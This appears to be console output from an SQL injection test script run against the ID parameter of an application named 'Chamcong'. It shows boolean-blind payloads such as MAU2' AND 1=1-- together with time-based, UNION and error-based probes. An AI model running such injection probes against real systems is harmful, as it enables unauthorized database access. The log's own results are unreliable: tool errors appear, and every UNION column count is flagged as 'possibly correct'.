━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
🔥 Chamcong SQL注入完整测试
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

[测试1] ID参数 - 布尔盲注
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
基线长度: 4205 bytes
ID=MAU2' AND 1=1--: 0 bytes
ID=MAU2' AND 1=2--: 0 bytes
⚠️  布尔盲注特征不明显

[测试2] ID参数 - 时间盲注
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
正常请求耗时: real 1.07
user 0.00
sys 0.00
s
延时5秒请求: real 0.00
user 0.00
sys 0.00
s
comprehensive_sql_injection_test.sh: line 44: bc: command not found
⚠️  时间盲注未确认

[测试3] ID参数 - UNION注入
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
列数 1: ✅ 可能正确
列数 2: ✅ 可能正确
列数 3: ✅ 可能正确
列数 4: ✅ 可能正确
列数 5: ✅ 可能正确
列数 6: ✅ 可能正确
列数 7: ✅ 可能正确
列数 8: ✅ 可能正确
列数 9: ✅ 可能正确
列数 10: ✅ 可能正确

[测试4] ID参数 - 错误注入
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
grep: error_version.html: No such file or directory
⚠️  无明显SQL错误

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
测试完成 - 查看结果文件
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
